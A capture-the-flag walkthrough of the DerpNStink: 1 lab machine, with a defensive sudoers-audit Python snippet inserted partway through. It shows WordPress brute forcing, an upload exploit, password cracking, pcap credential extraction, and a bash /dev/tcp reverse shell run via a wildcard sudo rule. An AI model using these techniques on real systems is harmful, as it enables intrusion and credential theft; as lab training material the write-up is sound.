DerpNStink: 1 walkthrough

Walkthrough of DerpNStink: 1

Enumeration:

root@kali:~# nmap -sT -A -sV --version-intensity 6 -p- 192.168.31.149

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache ht
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nothing from the FTP server:

root@kali:~# nmap --script='*ftp*' --script-args=unsafe=1 -p 20,21 192.168.31.149

Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-06 06:35 EST
Nmap scan report for 192.168.31.149
Host is up (0.00031s latency).

PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 11315 guesses in 600 seconds, average tps: 18.7

Using Metasploit we enumerate SSH users:

[+] 192.168.31.149:22 - SSH - User 'gopher' found
[+] 192.168.31.149:22 - SSH - User 'kernoops' found
[+] 192.168.31.149:22 - SSH - User 'libuuid' found
[+] 192.168.31.149:22 - SSH - User 'list' found
[+] 192.168.31.149:22 - SSH - User 'listen' found
[+] 192.168.31.149:22 - SSH - User 'lp' found
[+] 192.168.31.149:22 - SSH - User 'man' found
[+] 192.168.31.149:22 - SSH - User 'mountfsys' found
[+] 192.168.31.149:22 - SSH - User 'nobody' found
[+] 192.168.31.149:22 - SSH - User 'nobody4' found
[+] 192.168.31.149:22 - SSH - User 'nuucp' found
[+] 192.168.31.149:22 - SSH - User 'sync' found
[+] 192.168.31.149:22 - SSH - User 'web' found
[+] 192.168.31.149:22 - SSH - User 'webmaster' found
[+] 192.168.31.149:22 - SSH - User 'zabbix' found

Using searchsploit we find an OpenSSH user-enumeration exploit (CVE-2016-6210, timing based) that might help confirm SSH users:

python ./40136.py 192.168.31.149 -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10

User name enumeration against SSH daemons affected by CVE-2016-6210
Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari

[*] Testing SSHD at: 192.168.31.149:22, Banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
[*] Getting baseline timing for authenticating non-existing users…………
[*] Baseline mean for host 192.168.31.149 is 0.0631635 seconds.
[*] Baseline variation for host 192.168.31.149 is 0.0109688798904 seconds.
[*] Defining timing of x < 0.0960701396712 as non-existing user.
[*] Testing your users…
[+] rfindd – timing: 0.110398
[+] root – timing: 0.1100708

dirb finds us some interesting results:

---- Entering directory: http://192.168.31.149/php/ ----
==> DIRECTORY: http://192.168.31.149/php/phpmyadmin/
---- Entering directory: http://192.168.31.149/temporary/ ----
---- Entering directory: http://192.168.31.149/weblog/ ----
==> DIRECTORY: http://192.168.31.149/weblog/wp-admin/

I can’t seem to find the phpmyadmin version, but I do find out the PHP version, which is PHP/5.5.9-1ubuntu4.22. This might actually help at some point.

Using a longer wordlist we find http://192.168.31.149/webnotes, which offers some clues:

We try to login via SSH, but we get trolled:

Another dirb result catches our attention:

http://192.168.31.149/weblog/

This redirects to http://derpnstink.local/weblog/, which we cannot view because the hostname does not resolve. So we add the following to our /etc/hosts file:

root@kali:~/Desktop/AUTOMATED_actions# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

# stuff
192.168.31.149 derpnstink.local
192.168.31.149 www.derpnstink.local
root@kali:~/Desktop/AUTOMATED_actions#

Now we can access the page. It is obviously WordPress, so we fire up wpscan to enumerate and brute-force users:

wpscan --url http://derpnstink.local/weblog/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2

Brute Forcing 'admin' Time: 00:00:43 <========== > (1815 / 20470) 8.86% ETA: 00:07:28
+----+-------------+---------------------------------+----------+
| Id | Login       | Name                            | Password |
+----+-------------+---------------------------------+----------+
| 1  | unclestinky | 404 Not                         |          |
| 2  | admin       | admin - DeRPnStiNK Professional | admin    |
+----+-------------+---------------------------------+----------+

[+] Finished: Tue Mar 6 09:05:20 2018
[+] Requests Done: 22656

wpscan also finds some vulnerabilities:

We download and run the exploit from https://www.exploit-db.com/exploits/34681/.

I copy a PHP reverse shell into the working directory and start a netcat listener:

cp /usr/share/webshells/php/php-reverse-shell.php ./

nc -lvvp 777

I edit the shell with my IP and port and run the 34681.py exploit.

python ./34681.py -t http://derpnstink.local/weblog/ -f ./php-reverse-shell.php -u admin -p admin

We have a limited shell:

Make the shell usable:

echo $SHELL
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 55 columns 205
reset

We find some users in /etc/passwd:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

In /var/www/html/weblog we find the database user and password in the WordPress configuration:

/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

Log in to the MySQL server:

mysql -uroot -pmysql

mysql> SELECT * FROM wp_users;
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
| ID | user_login  | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key                           | user_status | display_name | flag2 |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
|  1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky   | unclestinky@DeRPnStiNK.local |          | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 |           0 | unclestinky  |       |
|  2 | admin       | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin         | admin@derpnstink.local       |          | 2017-11-13 04:29:35 |                                               |           0 | admin        |       |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
2 rows in set (0.00 sec)

mysql>

Using hashcat I recover the following WordPress password:

9b776afb479b31e8047026f1185e952dd1e530cb:wedgie57

We find the first flag by logging in to WordPress as unclestinky:

http://derpnstink.local/weblog/?p=8&preview=true

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

Clue in /support:

www-data@DeRPnStiNK:/support$ cat troubleshooting.txt
*******************************************************************
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.

However I don't want to specify each command to allow.

How can I exclude these commands from password protection to sudo?

********************************************************************

********************************************************************
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.

Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.

Thank you for using our product.

********************************************************************

The pastebin page says:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

So we need to escalate to the user mrderp, who can run those binaries through sudo.

We look at /home:

www-data@DeRPnStiNK:/home$ ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Nov 12 12:54 .
drwxr-xr-x 23 root   root   4.0K Nov 12 13:39 ..
drwx------ 10 mrderp mrderp 4.0K Jan  9 12:15 mrderp
drwx------ 12 stinky stinky 4.0K Jan  9 12:14 stinky

Password reuse?

su stinky
Password: wedgie57

Works!!

stinky cannot use sudo:

stinky@DeRPnStiNK:/home$ sudo su -l
[sudo] password for stinky: wedgie57

stinky is not in the sudoers file. This incident will be reported.
stinky@DeRPnStiNK:/home$

I found several SSH private keys, but none of them helped.

Hint:

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are…
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls -a
. .. derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ pwd
/home/stinky/ftp/files/network-logs
stinky@DeRPnStiNK:~/ftp/files/network-logs$

We can't run tcpdump ourselves because of permissions, but we do find a pcap file in /home/stinky/Documents.

We dump it to a text file and grep for "pass":

stinky@DeRPnStiNK:~/Documents$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
reading from file ./derpissues.pcap, link-type LINUX_SLL (Linux cooked)
stinky@DeRPnStiNK:~/Documents$ grep -i pass ./derpissues.txt
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User

We got the password:

stinky@DeRPnStiNK:~/Documents$ su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
mrderp@DeRPnStiNK:/home/stinky/Documents$

Flag 3 found:

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$

mrderp@DeRPnStiNK:~/Downloads$ sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~/Downloads$
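As an added check that is not part of the walkthrough, a sudoers audit that flags what makes this rule dangerous: a glob in the command path and a path under the rule's own user's home, where that user controls the file sudo will run as root. The mrderp line is the rule from the page; the other two sudoers lines, the user_homes mapping and the issue names are constructed for the example.

```python
import re

# Constructed sudoers user specifications for the audit. The mrderp line is the
# rule shown on this box (pastebin clue and "sudo -l"); the others are made-up
# contrasts: a NOPASSWD rule on a fixed path and a wildcard outside any home.
SUDOERS = """\
# User privilege specification
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
stinky ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
www-data ALL=(root) /usr/local/bin/backup-*.sh
"""

# user  host=(runas)  [TAG:]* command [args] [, ...]; the runas list is optional.
RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")

def audit_sudoers(text, user_homes):
    """Return (user, issue, path) findings for rules a reviewer should question.

    user_homes maps account -> home directory, as read from /etc/passwd.
    Issues: 'wildcard' (glob in the command path), 'user_writable_path'
    (command under the rule's own user's home, so that user decides what
    runs as root) and 'nopasswd'.
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        user = m.group("user")
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            tags = TAGS.match(spec)
            cmd = spec[tags.end():] if tags else spec
            path = cmd.split()[0]
            if any(ch in path for ch in "*?["):
                findings.append((user, "wildcard", path))
            home = user_homes.get(user, "").rstrip("/")
            if home and (path == home or path.startswith(home + "/")):
                findings.append((user, "user_writable_path", path))
            if tags and "NOPASSWD:" in tags.group(0):
                findings.append((user, "nopasswd", path))
    return findings
```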

We create derpy.sh in ~/binaries with a reverse shell command (the sudo rule matches any file named derpy* in that directory), start a netcat listener on our machine, and run the script through sudo:

mrderp@DeRPnStiNK:~/binaries$ echo '#!/bin/bash' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo 'bash -i >& /dev/tcp/192.168.31.139/888 0>&1' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.31.139/888 0>&1
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
[sudo] password for mrderp: derpderpderpderpderpderpderp

Got root?

The flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:/root/Desktop#
